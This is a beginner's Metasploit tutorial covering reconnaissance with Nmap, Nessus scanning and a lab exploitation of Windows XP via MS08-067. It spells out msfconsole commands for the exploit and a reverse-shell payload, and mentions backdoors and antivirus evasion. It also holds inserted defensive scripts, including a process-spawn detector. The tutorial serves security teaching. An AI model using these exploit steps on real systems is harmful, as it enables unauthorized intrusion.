Metasploit Framework by Achilli3st

Mar 02, 2016

Savan Patel

A small read on the Metasploit Framework along with Nessus and Nmap. Strictly for beginners, a bit old but way too good to start off with the Metasploit Framework. Deep description of working with each of the modules: auxiliary, payloads, exploits etc.

A good way to start off with metasploit.

Contact: [email protected]
  • THE METASPLOIT FRAMEWORK

    By Savan Patel (AKA X/Achilli3st)

  • CONTENTS

    Basics of Penetration Testing

    Setting up the Box

    Introduction to metasploit

    Information Gathering

    Vulnerability Assessment

    Exploitation

    Evading Firewall and Antivirus

    Post Exploitation

  • Chapter 1

    Basics of Penetration Testing

    Vulnerability:

    In terms of cyber security, a system vulnerability is a weakness or a flaw, either in the system hardware or the software, which can be taken advantage of (exploited) to gain access to the system.

    Illustration:

    Vivek owns a USB modem to access the internet. The modem has a limited plan of 1GB of 3G data. One day, while working on a project for hours together, Vivek realizes that he has exceeded his limit of 1GB of data but is still able to use the Internet.

    The modem updates itself about the usage of data each time it connects to the server. Hence, even though Vivek had exceeded the limit of 1GB, he was still able to use the internet because the modem had received no update about exceeding the limit. It is only when Vivek disconnects the modem and connects it again that he understands the update mechanism of the modem.

    Now that Vivek knows about the flaw in the update mechanism, he uses the modem to his full advantage.

    This flaw in the update mechanism is a VULNERABILITY of the USB modem.

  • Exploit:

    In terms of cyber security, taking advantage of a known flaw (vulnerability) in system hardware or software in order to compromise the system's security and gain access to or harm the system is known as Exploitation, and the piece of code that does the above is known as an EXPLOIT.

    Illustration:

    According to Greek mythology, Achilles was a Greek warrior and a hero of the Trojan war, a war fought between Troy and the Greeks.

    Achilles was known to be The Invincible because he was the son of a god. His mother tried to make him invincible by dipping him in the river, but he was left vulnerable at the heel, where his mother was holding him while dipping him in the river.

    Almost at the end of the Trojan war, Paris, the Prince of Troy, gets to know this vulnerability (the heel). Paris shoots a poisonous arrow at Achilles' heel and Achilles dies.

    So in the context of computer science, Achilles' heel was vulnerable, which Paris took advantage of. The act of Paris shooting the arrow at Achilles' heel is EXPLOITATION, and the poisonous arrow is an EXPLOIT.

  • PAYLOAD:

    In terms of cyber security, payloads are the programs that are executed on the victim machine after exploitation. This may include compromising the system's security and gaining complete privileges, deploying malicious software, etc.

    Note:

    Payload has its own different meanings in the context of Metasploit and in the context of networking.

    Listener:

    A listener is a component that needs to be set up on the attacker machine in cases where the victim machine would try to make a connection to the attacker, so that the listener can accept and handle the incoming connection. We come across such scenarios when the security level of the victim machines is high and an attacker would require an inside-out connection for exploitation.

    Social Engineering:

    Social Engineering is the act of manipulating people for the purpose of information gathering, gaining access to systems or even fraud.

  • What is Penetration Testing?

    Penetration Testing (often called Pentest) is the process of testing the security level of a single machine or a complete network by simulating attacks on these machines and providing proper solutions to overcome the security flaws found.

    The evaluation of security on these machines reveals the flaws that exist in the hardware or the software and the misconfigurations a network suffers from, and to what extent these flaws can be taken advantage of to breach the security and gain access to these machines and networks.

    The Metasploit Framework is one of the major parts of the Penetration Testing process. This framework allows the pen tester to evaluate to what extent the flaws on a machine can cause harm and grant privileges to the attacker.

    The Penetration Testing process is carried out in a well defined manner. This process has different phases, where each phase has its own necessity and importance.

    Phases of the Penetration Testing Process:

    1. Information Gathering

    2. Scanning

    3. Vulnerability Assessment

    4. Exploitation

    5. Post Exploitation

    6. Reporting

  • The Need for Penetration Testing:

    If companies do not find what is vulnerable in their networks or machines and patch it before an attacker gets their hands on it, then that might land them in big trouble.

    Cyber crimes have been at an all time high in the last decade. Things like web defacement, stealing of private information etc. could damage any organization's reputation. Hence no organization would like to risk such attacks.

  • Phases of Penetration Testing:

    Phase 1: Information Gathering

    Information gathering, also known as Reconnaissance, is the initial phase of penetration testing, where the Pen Tester starts gathering information about the target network or machine.

    Information gathering is basically of two types, active and passive.

    Passive information gathering involves collecting information about the target network or machine without directly interacting with them, for example searching whois records and other information available online.

    Active information gathering involves collecting information about the victim by directly interacting with the machine. Active information gathering may reveal a lot of information about the victim, for example emails, phone numbers etc.

    Phase 2: Scanning

    Scanning is the pre-attack phase, where the pen tester starts scanning the networks.

    Scanning is generally of three types:

    Network Scanning:

    Network scanning includes scanning the whole network to find which systems on the network are working or alive currently and which are not. Network scanning reveals the IP addresses of the computers which are currently up and can be scanned.

    Example: Angry IP Scanner

  • Port Scanning:

    After network scanning is successfully completed and has revealed the list of IP addresses that are up and running, the pen tester then starts scanning the ports on each machine. The scanned ports reveal the applications that are running on the systems. Port scanning also reveals the operating systems running on each of the machines in the network.

    Vulnerability Scanning:

    Vulnerability scanning is a part of the vulnerability assessment phase.

    Phase 4: Vulnerability Assessment

    In the vulnerability assessment phase all the machines are scanned for the vulnerabilities present on each of them. This process is carried out by the various vulnerability scanners available in the market.

    This is an automated process. The tools that are used for vulnerability assessment may not give 100% precise results; these scanners tend to generate false positives.

    Phase 5: Exploitation (Gaining Access)

    This phase of the penetration test is carried out by various techniques. These techniques involve Remote Administration Tools, Social Engineering and The Metasploit Framework.

    Phase 6: Post Exploitation

    After gaining access to the machines, the next thing is to maintain access. This is done by planting backdoors or rootkits, which would give the pen tester all the access any time they need it again.

  • Phase 7: Reporting

    This is the most important phase for a penetration tester, where documentation of the complete process that has been carried out is made. It mainly specifies the vulnerabilities that were present on the network that need to be patched, and most importantly it contains the solutions provided by the pen tester to secure the network and the individual machines.

  • CHAPTER 2

    Setting up the Box

    Penetration Testing requires tools like Metasploit, Nessus and Nmap. These tools are available as premium downloads if one wishes to buy them, or the free versions of these tools are always available.

    Tools required:

    1. Metasploit

    2. Nessus

    3. Nmap

    Windows Setup:

    If you are a Windows user and you wish to stick to Windows for the penetration testing, then Metasploit for Windows can be downloaded from the official Rapid7 website.

    http://www.rapid7.com/products/metasploit/download.jsp

    For Vulnerability Scanning you can use Nexpose or Acunetix. Both are Windows based vulnerability scanners. Nexpose is again a development of Rapid 7, and can be downloaded from their official website.

    http://www.rapid7.com/products/nexpose/

    Acunetix is another Windows based vulnerability scanner. It is known for its very user friendly GUI. It can be downloaded from its official website, which gives a trial version for free.

    http://www.acunetix.com/vulnerability-scanner/download/

  • And the last tool we would need is the nmap scanner. Nmap stands for Network Mapper; it is one of the oldest yet most powerful command line tools used for network scanning. Nmap is basically a Linux based tool but was made available for Windows users also after 2000.

    http://nmap.org/book/inst-windows.html

  • Linux Setup:

    All the tools required for penetration testing come built in to one of the flavours of Linux, i.e. Back Track.

    For the demonstrations in this book I have used Linux Back Track 5 Revision 3, the last of the Back Track releases. This operating system is specifically made for penetration testing and security research. It includes each and every little tool a penetration tester would need for testing.

    The makers of Back Track have released another such Linux based flavour called Kali Linux. It is also made for penetration testers and can be used by anybody. These operating systems are freely available on the internet.

  • My Setup:

    For the purpose of the demonstrations in this book, I have installed both the victim as well as the attacker on virtual machines. I have used VMware Workstation 9 for virtualization.

    Figure 1: VMware Workstation 9

    The Operating Systems:

    You can download Back Track from its official web site:

    http://www.backtrack-linux.org/downloads/

    Backtrack 5 Revision 3: Attacker Machine

    Figure 2: Backtrack 5 Revision 3 (Attacker)

  • Windows XP Service Pack 2: Victim Machine

    Figure 3: Windows XP SP2 (Victim)

  • Chapter 3

    Introduction to Metasploit

    What is The Metasploit Framework?

    The Metasploit Framework is open source and a part of The Metasploit Project by Rapid 7, which allows security experts to evaluate the security of a machine or a network and conduct penetration testing on them.

    The Metasploit Framework is a cross platform framework developed by H D Moore in 2003 and later acquired by Rapid 7.

    Metasploit is not a specific application; it is a complete framework which allows security experts not only to evaluate the security of a machine or a network but, since it is an open source project, also gives them the power to build their own programs, which can be added to the framework and used as they wish.

    For example, consider the Metasploit Framework as a set of building blocks which can be customized according to the pen tester's requirements, and then use the framework accordingly. Due to this flexibility Metasploit has emerged as one of the most widely used exploit development frameworks.

    Figure 4: The MSF Console

  • History of Metasploit:

    The complete Metasploit project (which includes the Metasploit Framework, the Opcode Database, the shellcode archive and security research) was developed by H Moore in 2003. Later Spoonm (handle) and Matt Miller joined the project.

    The vision behind the development of Metasploit was to bring all the exploits, payloads and post exploitation scripts under one platform to ease the life of a Penetration Tester. Before Metasploit came into the picture, exploits and payloads were individual executables which had to be downloaded, compiled and then executed.

    Initially it was programmed in Perl, but later, due to many disadvantages, it was rewritten in Ruby. Ruby was chosen for several reasons, and one of the major reasons was the ease of writing code, given that it is object oriented. Later, in the year 2009, The Metasploit Project was acquired by Rapid7, which deals with vulnerability management and penetration testing. Rapid7 is led by H Moore and Mike Tuchen in Massachusetts.

  • Features:

    Runs on Windows, Linux, Mac OS, Nokia N900, Android and jailbroken Apple iPhones.

    It has a GUI called Armitage and a console based interface, which make it very easy for users to use Metasploit.

    There are more than 1000 different exploits for Windows, Linux/Unix and Mac OS, and hundreds of payloads.

    It also provides encoding of the payloads, which helps attackers avoid getting detected by Anti-Virus programs.

    It lets the attacker gain different levels of access on the vulnerable remote machine.

    It helps evaluate to what level a machine is secured.

    It not only allows pen testers to do penetration testing; the Metasploit Framework has been built keeping security researchers in mind as well.

    Everything in the framework is accessible and alterable.

    An exploit developer can build their own exploits and integrate them into the Metasploit Framework for their own usage.

    Since the Metasploit Framework is open source, it helps researchers go through the code of the exploits and the payloads, which they can customize.

    Metasploit also supports databases, which help Penetration Testers keep track of all the penetration testing results.

  • Architecture of Metasploit Framework:

    The architecture of Metasploit has been designed in such a manner that the coupling between each module of Metasploit is as small as possible, so as to encourage code reuse in other major projects. The Metasploit Framework is open source, so the code of any exploit or any payload is readily available in case a programmer wants to reuse the code for further enhancement.

    The architecture of Metasploit consists of three major parts:

    Libraries

    Interfaces

    Modules

    Figure 5: Architecture of Metasploit Framework

  • Figure 6: Architecture of Metasploit Framework 2

    Libraries:

    REX:

    REX stands for Ruby EXploitation library. It is considered to be the most basic library for most of the functions. REX deals with sockets, protocols and shell interfaces. It is designed in such a way that it does not depend on anything other than the default install. The REX library contains various sets of classes and modules which are applicable for further extensions to projects. Some of the important classes are:

  • Assembly: Helps in generating assembly code on the fly, since it is very important for writing exploits.

    Encoding: The REX library allows users to encode buffers using different XOR algorithms. These encoders are used in the encode module.

    Exploitation: At times some vulnerabilities need to be exploited in a similar manner, i.e. the way they are attacked is similar. To provide flexibility, REX provides exploitation classes which serve these similar purposes.

    Sockets: Sockets is one of the most important sets of classes in the REX library. It provides important classes to establish connections to the remote machine.

    MSF Core:

    MSF Core contains a set of classes that provide an interface to the modules and plugins. It contains both auxiliaries and exploits:

    Exploits relating to HTTP, FTP, Oracle, SQL, SMB

    Auxiliaries relating to Scanners, Fuzzers, Report, DoS etc. The auxiliary module of MSF Core makes use of the REX libraries.

    MSF Base:

    While MSF Core implements some of the abstract sessions, MSF Base implements some of the concrete implementations. Two of the major sessions implemented in MSF Base are the Command shell and Meterpreter.

  • Interfaces:

    Msfcli:

    Msfcli is a command line interface for Metasploit. Msfcli is good when testing and developing new exploits and also good for learning the framework. But it has a major drawback: it can handle only one shell at a time, making it difficult for client side attacks. It also doesn't support any of the advanced automation features. It is a great tool for a tester who knows exactly what inputs have to be given to the console. Msfcli has the major advantage of directing output to other tools and also taking input from other tools.

    Msfcli is used directly from the shell terminal itself.

    Figure 7: MSFcli

  • MSF Console:

    MSFConsole is the most popular interface for Metasploit. It allows access to possibly all the options available in Metasploit. Once users get their hands on the msf console they appreciate the ease of use of msfconsole. It is in fact the easiest way to access and use The Metasploit Framework.

    Although the Metasploit Framework has been undergoing constant changes since it was released, the basic Metasploit usage commands remain the same.

    Figure 8: MSF Console

    Figure 9: Starting MSF Console

  • Armitage (GUI):

    Armitage is a front-end GUI for the Metasploit Framework which was developed by Raphael Mudge. It helps visualize the targets and exposes the complete features of Metasploit. It is made for security practitioners who do not use Metasploit on a daily basis.

    Figure 10: Armitage GUI

  • Modules of Metasploit Framework:

    Figure 11: MSF Console Screen

    Exploits:

    Exploits are programs that help the intruder take advantage of the vulnerabilities that are present on the victim system.

    Auxiliary:

    Auxiliary modules are exploits without payloads, which do not get you control over the victim system but perform functions like scanning, sniffing, fingerprinting and automating tasks.

    Posts:

    Post is the collection of scripts and programs that an intruder can use on the victim system to perform various actions after he/she has gained access to the system. Those actions may include editing registries, setting up backdoors and further gaining access to the internal network.

  • Payloads:

    Payloads are the programs that the attacker sends to the victim after exploiting the vulnerability, and the program is executed on the victim's machine. It gives the attacker control over the victim machine. Running a shell is the most common payload. The type of payload the attacker might choose depends on certain constraints, one of them being the memory buffer available on the victim system for the payload to execute.

    Payloads are on the whole divided into three types:

    Singles: Singles are completely standalone and simple codes that might be as simple as creating another user on the victim machine or running a small application.

    Stagers: Stagers are generally used to create a network connection between the attacker and the victim. They allow the attacker to initially use a small payload to load larger payloads onto the target machine. So a stager basically takes care of the restrictions that occur with single payloads.

    Stages: The various payload stages allow the attacker to have advanced control over the victim. An example of a stage is Meterpreter.

    Encoders and NOPs:

    The payloads and the exploits that the attacker sends to the victim machine may get detected by various security tools like antiviruses, IDS/IPS and firewalls. So to prevent these payloads and exploits from getting detected, Encoders and NOPs (No OPeration generators) are used, which encode the payloads and exploits when they are transmitted over the wire.

  • Working:

    The attacker attacks the victim machine using an exploit for a particular vulnerability.

    The exploit carries a small payload with it.

    The payload connects back to the Metasploit Framework, which lets the attacker overcome various kinds of restrictions that may occur when executing larger payloads on the remote machine.

    And at last there is a client-server connection between the attacker and the victim.

    Figure 12: Execution of Exploit and Payload

  • MSFupdate

    MSFupdate is one of the Metasploit utilities which allows a user to update the Metasploit Framework. Whenever Rapid7 releases an update for the Metasploit Framework, it can be downloaded directly on our machine using the MSFupdate utility.

    root@bt:~# msfupdate

    Figure 13: MSF Update

  • The Backend

    If a pen tester is running a penetration test on a huge network, then keeping track of everything going on becomes difficult for the pen tester. Hence Metasploit comes with extensive support for databases, which can store the things carried out in the Metasploit Framework and also import and export data from various other tools.

    The Metasploit Framework supports PostgreSQL, which is the default database.

    Setting up a database:

    -> Navigate to

    Figure 14: Default Database Credential File

    -> Open database.yml to see the default settings of the database. The default user names and passwords are created; note down these credentials as they will be required further on.

    Figure 15: The Database Credentials

  • -> To connect the database to the Metasploit Framework, execute the following command:

    msf > db_connect username:password@host_ip:port/database_name

    Figure 16: Connecting Database

    -> To check the status of the database, execute db_status.

    Figure 17: Database Connection Status

    -> To disconnect the database:

    msf > db_disconnect username:password@host_ip:port/database_name

    Figure 18: Disconnecting Database

  • -> Other database commands

    Figure 19: Database Commands

  • Chapter 4

    Information Gathering

    Information gathering (also known as Reconnaissance) is the initial stage of penetration testing, where the pen tester starts gathering information about the target network or a single machine. The main aim of this phase is to gather precise information about the victim. This information may include various things like how the organization operates, what may be the best way to get into the organization's computers, who would fall prey to social engineering etc. Information gathering has to be performed thoroughly in order to make sure the tester does not miss any vulnerable targets that can be exploited. It takes time and patience to perform information gathering and to know the complete infrastructure of the target. At this stage a pen tester tries to collect as much information as is available and makes sure each and every little thing is recorded.

    Information gathering is the most important aspect of any penetration test, since it provides the foundation for all the work that has to be carried out.

    Information gathering is divided into two types: passive information gathering and active information gathering.

    Passive information gathering is the technique of gathering information about the target without getting into direct contact with the victim machines.

    The tools, or rather services, that can be used to gather victim information include whois search, netcraft etc.

    Let us take a look at a few tools and techniques that can fetch us information about the target.

  • Whois Search

    Whois is basically a huge database that stores information about the registered resources on the internet. When a new domain name is bought on the internet, information like the name of the company the website is registered to, the name of the registrar, contact details etc. is stored in this database.

    Example:

    root@bt:~# whois asianlaws.org

    root@bt:~# whois website_name.com

    Figure 20: Whois Query

  • This reveals several things about an organization which may turn out to be pretty important for a pen tester. There are plenty of websites that provide this service, like who.is, whois.com etc.

    Netcraft

    -> Netcraft is an online service which provides web server, operating system and domain name server detection etc.

    Figure 21: Netcraft Service

    NS Lookup:

    NS Lookup is a command line tool available in various operating systems which is used for querying IP addresses, the domain name system and various other things. It is present in Windows as well as many Linux flavours.

    Figure 22: NS Lookup

  • Google Dorks:

    Google dorks are a way to dig up information about websites, web servers etc. This information is revealed due to inappropriate configuration of the servers and the websites.

    This is an example of a google dork which reveals the admin login page of the website.

    Figure 23: Google Dorks

  • Active Information Gathering

    In active information gathering the information about the target is fetched by directly getting into contact with the target machine or network. The results of active information gathering are generally the conclusions drawn from the various queries that are put to the network or the machines.

    Nmap is one of the most powerful tools developed to date for active information gathering.

    General nmap scanning:

    Figure 24: Basic Nmap Scan

    To use nmap in Backtrack we use the nmap command from the terminal, followed by the options and the IP address.

    Options:

    -sS -- Stealth Scan

    -sV -- Remote Services Version Detection

    -O -- Operating System Detection

  • Using the Metasploit Back end to store results:

    In a complex penetration testing scenario where a whole network or a very large number of computers are being tested, it becomes difficult for the pen testers to keep track of all the computers.

    This issue is addressed in Metasploit, where the scan results of nmap can be imported into the framework database. This is also an advantage when a group of pen testers are working together on a large network.

    To import the scan data into the framework database, the results of nmap have to be stored in a file, which can later be imported into the framework using the db_import option of the framework database.

    Figure 25: Subnet Scan

    In the above scan we store the results in a file named nmap. Writing to a file is done by using the -oX option of the nmap scanner.

  • Figure 26: Connecting the Database

    Connect the database to the Metasploit Framework using the db_connect command and then import the nmap results that we have stored in the file named nmap. To import the data into the framework we use the db_import command.

    Figure 27: Importing Nmap Results

    After importing the file, we can apply queries to the imported data and use it for further testing.

    Figure 28: Nmap Results in Metasploit Framework

    Running Nmap from Metasploit:

    Apart from running nmap and importing the results into Metasploit, Metasploit also comes with the ability to run nmap directly from the Metasploit Framework.

  • To run nmap from the Metasploit Framework we use the following command:

    msf > db_nmap -options x.x.x.x

    Figure 29: Nmap from Metasploit

  • Scanning with Metasploit:

    Even though nmap is a very powerful tool, the Metasploit Framework itself comes with all these inbuilt capabilities, so that it does not need nmap or any such scanning tool.

    The modules that conduct this scanning are called auxiliary modules. These modules provide pen testers with all the major types of scans that they need.

    The scanning with an auxiliary module is carried out in 3 phases:

    -> Setting up the type of scan required using the use command.

    Figure 30: Auxiliary Scan

    -> Setting the parameters of the scan. To set the parameters, first check the parameters required for running the module. Set the parameters using the set command.

  • -> Run the auxiliary scan using the run command.

    Figure 31: Auxiliary Scan Result

    The auxiliary module of Metasploit provides an extensive range of scanning programs.

    Figure 32: Auxiliary Scanning Module

    A few of these programs can help detect the kind of services that are running, and there are other programs that help evaluate the number of ports open on the machine.

  • Chapter 5

    Vulnerability Assessment

    Vulnerability assessment is an automated program which looks for weaknesses in remote computers or networks. The vulnerability scanner comes to a conclusion about a vulnerability based on the response it receives to the packets it sends.

    Scanning with Nessus:

    Installing Nessus:

    -> Nessus comes pre-installed in the operating system that we are currently using for penetration testing (i.e. Backtrack 5 R3).

    -> But before we start using Nessus directly we need to enable it.

    -> To enable Nessus we need to register on tenable.com as a user.

    -> And to use Nessus for free we need to register for the home feed.

    http://www.tenable.com/products/nessus/nessus-homefeed

    -> After registering we would receive a mail with the activation code at our email address.

    Figure 33: Nessus Registration

  • -> After we receive the activation code, activate Nessus on the Backtrack OS from the terminal using the following command.

    root@bt:~# /opt/nessus/bin/nessus-fetch --register x-x-x-x-x

    Figure 34: Activating Nessus

    -> After that is completed, register a user.

    Figure 35: User Add

  • Register a user with the user add function of Nessus; this registered user will be used to log into Nessus and use it.

    Figure 36: Registering User

    After successfully registering a user, to use Nessus start the Nessus server using the start nessus option in the dropdown list.

    Figure 37: Start Nessus

  • Running Nessus:

    The Nessus vulnerability scanner is accessed from a browser. After the Nessus server is initialized, open a web browser and browse to https://localhost:8834; this opens the Nessus login screen as shown.

    Figure 38 Accessing Nessus

    Figure 39 Nessus Login Screen

  • -> Login with the name of the user that we created.

    Figure 40 Nessus Interface

    Scanning with Nessus:

    To start scanning with Nessus go to the scans option and click add scan. Give the scan options and launch the scan.

    Figure 41 Initializing Scanning

  • The vulnerability scan takes a little time. After the scan has completed, the report can be viewed from the reports column.

    Figure 42 Scanning Reports

    Browse through the list of vulnerabilities in the report. The vulnerabilities are sorted by the level of risk they pose.

    Figure 43 List of Vulnerabilities

    Figure 44 List of High Risk Vulnerabilities

  • Importing Nessus results into The Framework Database:

    -> To import the Nessus report into the metasploit database:

    -> Download the report from Nessus in .nessus format.

    -> Once the msf console is connected to the database, import the file using db_import.

    Figure 45 Connect to database

    msf > db_import report.nessus

    Download the Nessus vulnerability report and then import it into the metasploit framework database using the db_import command.

    Figure 46 Importing Nessus Report

    Pen testers can run general queries against the vulnerability database to fetch the information.

    Figure 47 Querying Nessus Results
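    The .nessus file that db_import consumes is plain XML (NessusClientData_v2), so the same report can be triaged outside the framework. The script below is an added example, not part of the tutorial, of Nessus or of Metasploit: it parses a constructed .nessus report (hosts, plugin IDs and plugin names are illustrative sample values, not real scan output) and sorts findings by severity the way the Nessus report view does, so the high-risk items can be pulled out for review.

```python
"""Summarize a Nessus v2 (.nessus) report by host and severity.

Added example (not part of the original tutorial, Nessus or Metasploit).
It parses the XML format that `db_import report.nessus` consumes.
The sample report below is constructed: hosts, plugin IDs and names are
illustrative values, not real scan output.
"""
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus severity levels: 0 = Info, 1 = Low, 2 = Medium, 3 = High, 4 = Critical
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample in NessusClientData_v2 layout (values are illustrative).
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.0.2.10">
      <HostProperties>
        <tag name="host-ip">192.0.2.10</tag>
        <tag name="operating-system">Microsoft Windows XP Service Pack 2</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="99001" pluginName="Sample: Server service RPC remote code execution"
                  pluginFamily="Windows">
        <risk_factor>Critical</risk_factor>
        <cvss_base_score>10.0</cvss_base_score>
      </ReportItem>
      <ReportItem port="139" svc_name="smb" protocol="tcp" severity="2"
                  pluginID="99002" pluginName="Sample: SMB signing not required"
                  pluginFamily="Misc.">
        <risk_factor>Medium</risk_factor>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="99003" pluginName="Sample: OS identification"
                  pluginFamily="General">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.0.2.11">
      <HostProperties>
        <tag name="host-ip">192.0.2.11</tag>
      </HostProperties>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="1"
                  pluginID="99004" pluginName="Sample: weak SSH cipher"
                  pluginFamily="Misc.">
        <risk_factor>Low</risk_factor>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return a list of finding dicts, one per ReportItem, most severe first."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        # HostProperties carries per-host tags such as host-ip and operating-system
        props = {t.get("name"): t.text for t in host.iter("tag")}
        for item in host.iter("ReportItem"):
            findings.append({
                "host": props.get("host-ip", host.get("name")),
                "os": props.get("operating-system", "unknown"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "service": item.get("svc_name"),
                "severity": int(item.get("severity")),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "cvss": float(item.findtext("cvss_base_score") or 0.0),
            })
    # Highest severity first, then highest CVSS, then host and port for stable output
    findings.sort(key=lambda f: (-f["severity"], -f["cvss"], f["host"], f["port"]))
    return findings


def severity_summary(findings):
    """Count findings per severity label, e.g. {'Critical': 1, 'Medium': 1, ...}."""
    return dict(Counter(SEVERITY_NAMES[f["severity"]] for f in findings))


def high_risk(findings, minimum=3):
    """Findings at or above a severity level (default 3 = High)."""
    return [f for f in findings if f["severity"] >= minimum]


if __name__ == "__main__":
    results = parse_nessus(SAMPLE_NESSUS)
    print(severity_summary(results))
    for f in high_risk(results):
        print(f"{f['host']}:{f['port']}/{f['protocol']} "
              f"[{SEVERITY_NAMES[f['severity']]}] {f['name']}")
```

    Run it as a script to print the severity counts and the High/Critical findings; the same functions can be pointed at a real exported report by reading the file into parse_nessus.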

  • Chapter 6

    Exploitation

    The metasploit framework now comes with more than 1000 exploits, and the number of exploits keeps increasing over time. Different exploits have different capabilities, and they range from Windows and Ubuntu exploits to Android exploits.

    Let us quickly proceed towards exploitation.

    Exploitation is carried out in four steps:

    -> Setting the exploit

    -> Setting the Payload

    -> Setting the options

    -> Exploit

  • Basic Commands:

    ---> search

    The search command is used to search for any specific exploit, any specific payload or any other module as well.

    Figure 48 Search Command

    ---> use

    The use command is used to select the exploit.

    Figure 49 Use Command

    ---> show

    The show command is used to see the list of exploits, payloads and also the options that are to be set for successful exploitation.

    Figure 50 Show Command

  • ---> set

    The set command is used to set things like the payload and the various options that need to be configured for exploitation.

    Figure 51 Set Command

    Based on the vulnerabilities found on the victim machine, one strong vulnerability is chosen, exploiting which could give us maximum privileges. In the current scenario we would choose MS08-067, which was one of the vulnerabilities we found in the vulnerability assessment. This is a netapi vulnerability which allows the attacker to execute code remotely using Remote Procedure Call.

    Victim Machine:

    -> Windows XP Service Pack 2

    Figure 52 Victim Machine

  • STEP 1:

    -> Using the search command we can find the exploit for this vulnerability.

    Figure 53 Searching Exploit

    -> After we have found the exploit which we were looking for, the next step is to select the exploit for use.

    -> To do so we use the use command:

    msf > use name-of-exploit

    Figure 54 Setting Exploit

    STEP 2:

    -> After we have set the exploit, the next thing to do is to look for an appropriate payload for the exploit.

    -> In the previous definitions we have seen that a payload is something that is going to execute on a remote machine after the remote machine has been exploited.

  • -> So in this case let us choose a payload that fetches us a command prompt of the remote machine.

    msf exploit(ms08_067_netapi) > search windows/shell

    msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

    Figure 55 Searching Payload

  • STEP 3:

    -> After the exploit and the payload have been set, the next thing to do is to set the options that are required to execute the exploit successfully.

    -> To see the options that are required to be set, use the command show options.

    Figure 56 Show Options

  • RHOST : Remote machine IP Address

    RPORT : Remote machine Port Number

    LHOST : Local Host IP Address

    LPORT : Local Port Number

    -> For this attack we require two things to be configured, the LHOST and the RHOST; the rest of the options like LPORT, RPORT etc. that are needed for the attack are preconfigured.

    -> To set the LHOST and the RHOST we use the set command:

    msf exploit(ms08_067_netapi) > set LHOST x.x.x.x

    msf exploit(ms08_067_netapi) > set RHOST x.x.x.x

    Figure 57 Set Options

    Note: We have not selected any specific exploit target, so it is set to automatic targeting.

  • STEP 4:

    -> The last and final step of the process is to exploit.

    -> This is done using the exploit command.

    Figure 58 Exploit Command

    We have successfully broken into the victim machine, and we have a command prompt with which we can explore deep into it.

    If we take a look at the victim machine everything seems to be normal; there is no clue of anything wrong at all.

    Figure 59 No Suspicion

  • But in case the victim is smart enough to take a look at the processes running on his machine, he would find a background command prompt on his machine, which would create suspicion.

    Figure 60 Victim Task Manager

    This means that a completely new process has been created on the victim machine. What can be done to avoid such detection? We would take a look at it in the upcoming chapters.
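    The background command prompt in the task manager is the defender's clue, and the tell is not just that cmd.exe exists but who its parent is: the Server service that MS08-067 targets runs inside svchost.exe, and svchost.exe never legitimately launches an interactive shell. The script below is an added example, not part of the tutorial or of Metasploit, that runs that parent/child check over constructed process-creation records (a simplified Sysmon-like key=value line format; hosts, PIDs, paths and user names are sample values). The parent list also covers browsers, which generalises the same check to the client-side case in the next chapter.

```python
"""Flag command shells spawned by processes that should never spawn them.

Added example (not from the tutorial or Metasploit). The records below are
constructed process-creation events in a simplified Sysmon-like
"key=value key=value" line format; every value is a sample value.
"""

# Interactive shells we care about
SHELLS = {"cmd.exe", "powershell.exe"}

# Parents that host services or network-facing clients and should not
# launch interactive shells. The browsers cover client-side exploitation.
SUSPICIOUS_PARENTS = {
    "svchost.exe", "services.exe", "lsass.exe", "spoolsv.exe",
    "iexplore.exe", "firefox.exe",
}

# Constructed sample telemetry (not real log output). Raw string so the
# single backslashes in Windows paths survive.
SAMPLE_EVENTS = r"""
ts=2015-01-15T10:20:01 host=XP-LAB pid=1340 image=C:\WINDOWS\explorer.exe parent_pid=1200 parent_image=C:\WINDOWS\system32\userinit.exe user=vivek
ts=2015-01-15T10:21:15 host=XP-LAB pid=1588 image=C:\WINDOWS\system32\cmd.exe parent_pid=1340 parent_image=C:\WINDOWS\explorer.exe user=vivek
ts=2015-01-15T10:26:38 host=XP-LAB pid=1724 image=C:\WINDOWS\system32\cmd.exe parent_pid=1032 parent_image=C:\WINDOWS\system32\svchost.exe user=SYSTEM
ts=2015-01-15T10:27:02 host=XP-LAB pid=1760 image=C:\WINDOWS\system32\notepad.exe parent_pid=1340 parent_image=C:\WINDOWS\explorer.exe user=vivek
"""


def parse_event(line):
    """Parse one 'key=value key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def basename(path):
    """Image file name without its directory, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_shells(events):
    """Return (event, reason) pairs for shells with an anomalous parent or account."""
    hits = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        if image not in SHELLS:
            continue
        if parent in SUSPICIOUS_PARENTS:
            hits.append((ev, f"{image} spawned by {parent}"))
        elif ev.get("user", "").upper() == "SYSTEM":
            # A shell running as SYSTEM on a workstation is unusual on its own
            hits.append((ev, f"{image} running as SYSTEM under {parent}"))
    return hits


def scan(text):
    """Parse a block of event lines and return the suspicious shells in it."""
    return suspicious_shells(parse_event(l) for l in text.splitlines() if l.strip())


if __name__ == "__main__":
    for ev, reason in scan(SAMPLE_EVENTS):
        print(f"{ev['ts']} {ev['host']} pid={ev['pid']}: {reason}")
```

    Of the four sample events only the cmd.exe whose parent is svchost.exe is reported; the cmd.exe a user opened from explorer.exe is left alone, which is the distinction a task-manager glance cannot make.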

  • Chapter 7

    Evading Firewall and Anti Viruses

    In the last chapter we have seen how to exploit a victim machine and take control over it.

    In this chapter we would take a close look at how to evade a firewall first and then the anti viruses.

    PART 1: EVADING FIREWALL

